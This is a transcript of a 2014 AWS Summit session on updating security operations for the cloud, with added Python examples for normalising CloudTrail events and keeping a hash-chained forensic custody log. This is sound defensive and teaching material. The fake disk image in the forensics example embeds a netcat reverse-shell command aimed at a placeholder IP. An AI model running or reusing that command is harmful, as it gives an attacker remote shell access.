AWS Summit Sydney 2014 | Updating Security Operations for the Cloud - Session Sponsored by Trend Micro
This session is recommended for technical users who want to know how the day-to-day work of securing their on-premises workloads should change when moving to the cloud. Learn how to increase the effectiveness of your security operations as you move to the cloud. We will discuss how your current incident response, forensic investigation, monitoring, and audit response tactics have to change in the cloud. Pulling from experience helping clients move to the cloud, industry research, and the school of hard knocks, this talk provides practical advice you can apply today.

Published in: Technology, Business
  1. © 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or in part without the express consent of Amazon.com, Inc. Updating Security Operations For The Cloud. Justin Foster, Senior Product Manager, Cloud & Data Center Security, Trend Micro
  2. G’Day Eh?
  3. Strategy / Tactics
  4. Tactics
  5. Tactics: Auditing, Monitoring, Incident Response, Forensic Investigations
  6. Traditional Responsibility Model. You: Operating System, Application, Account Management, Facilities, Physical Security, Physical Infrastructure, Network Infrastructure, Virtualization Infrastructure
  7. Shared Responsibility Model. You: Operating System, Application, Account Management, Security Groups, Network Configuration. AWS: Facilities, Physical Security, Physical Infrastructure, Network Infrastructure, Virtualization Infrastructure
  8. Structure: Before, After, Bonus
  9. Auditing
  10. PCI Compliance
  11. Requirements: Encrypting data at rest (3.4.1); Address new threats & vulnerabilities (6.6); Log external facing services & defences (10.2, 10.5.4); Protect systems against malware (5.1). * PCI has many, many more requirements, this is just a sample
  12. Creating an audit trail, before. On-premises: Servers, Storage Area Network, Firewall, IPS, Central logging, Change Records, Report
  13. Creating an audit trail, after. On-premises: Payment, Client Data. AWS: Amazon CloudTrail, EC2 instances, Amazon S3, Amazon CloudFront, Amazon RDS. Central management, Report
  14. Creating an audit trail, bonus points. You get: Record of changes via AWS CloudTrail; Security control reporting via Deep Security’s API. Why it matters: Regular assurance that controls are in place
  15. In action…
  16. Monitoring
  17. Visibility
  18. Requirements: Basic event info (5W+H); Context of the event; Consistent identity across environments; Timely
  19. Visibility, before. On-premises: Firewall, IPS, Switch, Switch, Switch, Directory Server, Central logging, SIEM
  20. Visibility, after. AWS: Amazon CloudTrail, EC2 instances, Amazon S3 Bucket, Amazon CloudFront, Amazon RDS, Amazon S3. Central logging, SIEM
  21. Visibility, bonus points. You get: More work to put together events; Richer context around events. Why it matters: Visibility is key to your security practice
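Slides 14 and 18 to 21 make two concrete claims: CloudTrail gives you a record of changes, and a usable event needs the 5W+H plus a consistent identity across environments. The following is an added example (not code from the talk, Trend Micro or AWS) of what that looks like in practice: it reads CloudTrail records, normalises each into who/what/when/where/how, resolves assumed-role sessions back to the IAM role that issued them so the same actor looks the same everywhere, keeps only successful mutating calls for the change record, and flags two things an auditor always asks about. The three records are constructed; they follow the CloudTrail record layout, but the account ID, ARNs, IP addresses and request/event IDs are placeholders.

```python
"""Normalise AWS CloudTrail records into 5W+H events and a change record.

Added example, not code from the talk. The records below are constructed:
they follow the CloudTrail record layout, but the account ID, ARNs, IPs and
request/event IDs are placeholders.
"""
import json

SAMPLE_TRAIL = json.loads("""
{"Records": [
 {"eventVersion": "1.02", "eventTime": "2014-05-15T02:14:07Z",
  "eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
  "awsRegion": "ap-southeast-2", "sourceIPAddress": "203.0.113.10",
  "userAgent": "aws-cli/1.3.6 Python/2.7.6",
  "userIdentity": {"type": "IAMUser", "accountId": "123456789012",
   "arn": "arn:aws:iam::123456789012:user/alice", "userName": "alice"},
  "requestParameters": null, "responseElements": null,
  "requestID": "req-0001", "eventID": "evt-0001"},
 {"eventVersion": "1.02", "eventTime": "2014-05-15T02:15:33Z",
  "eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
  "awsRegion": "ap-southeast-2", "sourceIPAddress": "198.51.100.7",
  "userAgent": "console.ec2.amazonaws.com",
  "userIdentity": {"type": "AssumedRole", "accountId": "123456789012",
   "arn": "arn:aws:sts::123456789012:assumed-role/OpsAdmin/bob",
   "sessionContext": {"sessionIssuer": {"type": "Role", "userName": "OpsAdmin",
    "arn": "arn:aws:iam::123456789012:role/OpsAdmin"}}},
  "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
   {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
    "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}},
  "responseElements": {"_return": true},
  "requestID": "req-0002", "eventID": "evt-0002"},
 {"eventVersion": "1.02", "eventTime": "2014-05-15T02:16:01Z",
  "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
  "awsRegion": "ap-southeast-2", "sourceIPAddress": "198.51.100.7",
  "userAgent": "aws-cli/1.3.6 Python/2.7.6",
  "userIdentity": {"type": "IAMUser", "accountId": "123456789012",
   "arn": "arn:aws:iam::123456789012:user/alice", "userName": "alice"},
  "requestParameters": {"name": "Default"}, "responseElements": null,
  "errorCode": "AccessDenied",
  "errorMessage": "User is not authorized to perform: cloudtrail:StopLogging",
  "requestID": "req-0003", "eventID": "evt-0003"}
]}
""")["Records"]

READ_ONLY_PREFIXES = ("Describe", "Get", "List", "Lookup")
TRAIL_TAMPERING = {"StopLogging", "DeleteTrail", "UpdateTrail"}


def who(identity: dict) -> str:
    """Consistent identity: an assumed-role session is reported as the IAM role
    that issued it plus the session name, so 'bob via OpsAdmin' is the same
    actor in every region and every environment."""
    issuer = identity.get("sessionContext", {}).get("sessionIssuer")
    if identity.get("type") == "AssumedRole" and issuer:
        session = identity["arn"].rsplit("/", 1)[-1]
        return f"{issuer['arn']} (session {session})"
    return identity.get("arn", identity.get("type", "unknown"))


def normalise(rec: dict) -> dict:
    """5W+H: who did what, when, where, and how (source IP and tool)."""
    return {
        "id": rec["eventID"],
        "who": who(rec["userIdentity"]),
        "what": f"{rec['eventSource'].split('.')[0]}:{rec['eventName']}",
        "when": rec["eventTime"],
        "where": rec["awsRegion"],
        "how": f"{rec['sourceIPAddress']} via {rec['userAgent']}",
        "outcome": rec.get("errorCode", "Success"),
        "params": rec.get("requestParameters") or {},
    }


def is_change(rec: dict) -> bool:
    """The change record only counts successful, mutating API calls."""
    return not rec["eventName"].startswith(READ_ONLY_PREFIXES) and "errorCode" not in rec


def world_open_ingress(params: dict) -> bool:
    """True if any rule in an AuthorizeSecurityGroupIngress request is open to the world."""
    for perm in (params.get("ipPermissions") or {}).get("items", []):
        for key, field in (("ipRanges", "cidrIp"), ("ipv6Ranges", "cidrIpv6")):
            for rng in (perm.get(key) or {}).get("items", []):
                if rng.get(field) in ("0.0.0.0/0", "::/0"):
                    return True
    return False


def risk_flags(rec: dict) -> list:
    """Flags are raised on attempts as well: a denied StopLogging is still worth seeing."""
    flags = []
    if rec["eventSource"] == "cloudtrail.amazonaws.com" and rec["eventName"] in TRAIL_TAMPERING:
        flags.append("audit-trail-tampering")
    if rec["eventName"] == "AuthorizeSecurityGroupIngress" and \
            world_open_ingress(rec.get("requestParameters") or {}):
        flags.append("world-open-ingress")
    return flags


def change_record(records: list) -> list:
    """Audit-trail view: every successful change, normalised and flagged."""
    return [dict(normalise(r), flags=risk_flags(r)) for r in records if is_change(r)]


def flagged_events(records: list) -> list:
    """Monitoring view: anything risky, whether or not it succeeded."""
    return [dict(normalise(r), flags=risk_flags(r)) for r in records if risk_flags(r)]


if __name__ == "__main__":
    for ev in change_record(SAMPLE_TRAIL):
        print(json.dumps(ev, indent=2))
```

Note the split between the two views: the change record (what an auditor wants) drops the denied StopLogging because nothing changed, while the monitoring view keeps it because somebody tried to switch off the audit trail. Both come from the same normalised events, which is the "richer context, more work to put it together" trade-off of slide 21.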
  22. In action…
  23. Incident Response
  24. Under pressure
  25. SANS incident response process: Preparation (Get ready!), Identification (What is it?), Containment (Did we get it?), Eradication (Is it gone?), Recovery (Again?), Lessons Learned (Get better, fast!)
  26. Requirements: Quickly identify affected area; Minimize impact; Recover quickly
  27. Incident Response, before. On-premises: Server, Replacement, Analysis, Report, Improve
  28. Incident Response, after. AWS: Instance, Analysis, Report, Improve, Replacement
  29. Incident Response, bonus points. You get: Faster return to production; More time for analysis. Why it matters: Every minute of downtime counts
  30. In action…
  31. Optimized Response: Instance, Analysis, Report, Improve (Analyst); Log Processor, API, Replacement
  32. Forensic Investigations
  33. Rinse & Repeat
  34. Perception
  35. Reality
  36. Reality, visualized
  37. Requirements: Repeatable; Account for & prove each step; Not get in the way of recovery; Heavily documented
  38. Forensics, before. On-premises: Server, Logs, Analysis, Testimony, Copy
  39. Forensics, after. AWS: Instance, Logs, Analysis, Testimony, Copy
  40. Forensics, bonus points. You get: Faster analysis & lower costs; Ability to replicate entire environment. Why it matters: Legal requirements; Better defences
  41. In action…
  42. Original, Copy 0, Copy 1, Copy 2; Concurrent Analysis; Examiner Commands; Analysis
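Slide 37 sets the forensics bar (repeatable, every step accounted for and provable, heavily documented) and slide 42 shows the shape: an original, several copies, and concurrent analysis by the examiner. The following is an added example, not code from the talk, of the bookkeeping that makes those copies admissible: the original is hashed once and sealed, every copy is verified against that acquisition hash before use, and every command the examiner runs is appended to a hash-chained custody log so that an edited or missing step is detectable afterwards. It assumes Copy 0 is a preserved reference copy and Copy 1 and Copy 2 are working copies for concurrent analysis (an interpretation of the slide, not something it states), and stands in for an EBS snapshot with a constructed in-memory byte string; in AWS the same steps would wrap snapshot copies and the volumes created from them.

```python
"""Chain-of-custody ledger for cloud forensics: every copy and every analysis
step is hashed and appended to a tamper-evident log.

Added example, not from the talk. Evidence is a constructed byte string
standing in for a volume snapshot; the copy labels follow slide 42 under the
assumption that copy-0 is the reference copy and copy-1/copy-2 are working copies.
"""
import hashlib
import json
from datetime import datetime, timezone

GENESIS = "0" * 64


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    """Append-only log; each entry carries the hash of the previous one, so
    editing or dropping a step breaks the chain (requirement: prove each step)."""

    def __init__(self, case_id: str, examiner: str):
        self.case_id, self.examiner, self.entries = case_id, examiner, []

    def record(self, action: str, subject: str, digest: str, note: str = "") -> dict:
        entry = {"case": self.case_id, "seq": len(self.entries),
                 "when": datetime.now(timezone.utc).isoformat(),
                 "who": self.examiner, "action": action, "subject": subject,
                 "sha256": digest, "note": note,
                 "prev": self.entries[-1]["entry_hash"] if self.entries else GENESIS}
        entry["entry_hash"] = sha256(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)
        return entry

    def verify_chain(self) -> bool:
        """Replay the ledger: every entry must hash to its entry_hash and link to its predecessor."""
        prev = GENESIS
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "entry_hash"}
            if e["prev"] != prev or sha256(json.dumps(body, sort_keys=True).encode()) != e["entry_hash"]:
                return False
            prev = e["entry_hash"]
        return True

    def acquisition_hash(self) -> str:
        return self.entries[0]["sha256"]


def acquire(original: bytes, log: CustodyLog) -> str:
    """Hash the original once; it is never analysed directly."""
    return log.record("acquire", "original", sha256(original), "snapshot taken, original sealed")["sha256"]


def make_copy(source: bytes, label: str, log: CustodyLog) -> bytes:
    """Bit-for-bit copy, verified against the acquisition hash before it is handed out."""
    copy = bytes(source)
    digest = sha256(copy)
    if digest != log.acquisition_hash():
        raise RuntimeError(f"{label} does not match acquisition hash")
    log.record("copy", label, digest, "verified against acquisition hash")
    return copy


def verify_copy(copy: bytes, label: str, log: CustodyLog) -> bool:
    """Re-check a copy; the result is logged whether it matches or not."""
    digest = sha256(copy)
    ok = digest == log.acquisition_hash()
    log.record("verify", label, digest, "match" if ok else "MISMATCH")
    return ok


def analyse(copy: bytes, label: str, command: str, log: CustodyLog) -> int:
    """Stand-in analysis step (counts a marker string); real tooling would run here.
    The copy is verified first and the command plus result are logged."""
    if not verify_copy(copy, label, log):
        raise RuntimeError(f"refusing to analyse {label}: hash mismatch")
    hits = copy.count(b"/bin/sh")
    log.record("analyse", label, sha256(copy), f"{command}: {hits} hits")
    return hits


def run_investigation(original: bytes, examiner: str = "examiner-1") -> CustodyLog:
    """Original -> copy-0 (reference) -> copy-1 and copy-2 analysed concurrently."""
    log = CustodyLog("case-0001", examiner)
    acquire(original, log)
    copy0 = make_copy(original, "copy-0", log)
    copy1 = make_copy(copy0, "copy-1", log)
    copy2 = make_copy(copy0, "copy-2", log)
    analyse(copy1, "copy-1", "strings | grep /bin/sh", log)
    analyse(copy2, "copy-2", "timeline", log)
    verify_copy(copy0, "copy-0", log)  # reference copy still untouched at the end
    return log


# Constructed evidence: a fake volume image containing two shell references.
SAMPLE_IMAGE = b"\x00" * 64 + b"#!/bin/sh\nnc -e /bin/sh 198.51.100.7 4444\n" + b"\x00" * 64

if __name__ == "__main__":
    log = run_investigation(SAMPLE_IMAGE)
    for e in log.entries:
        print(e["seq"], e["action"], e["subject"], e["sha256"][:12], e["note"])
    print("chain intact:", log.verify_chain())
```

The ledger, not the disk image, is what ends up in testimony: it answers "which copy, taken when, by whom, verified against what" for every command. Because it is hash-chained, it can be exported alongside the snapshots and re-verified by anyone later, which is the repeatability slide 37 asks for without blocking recovery, since the production instance is replaced while the copies are worked on.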
  43. Keys
  44. Auditing, Monitoring, IR, Forensics
  45. Thank you. Justin Foster, justin_foster@trendmicro.com, @justin_foster. Care of: Mark Nunnikhoven @marknca
  46. © 2014 Amazon.com, Inc. and its affiliates. All rights reserved. May not be copied, modified, or distributed in whole or in part without the express consent of Amazon.com, Inc.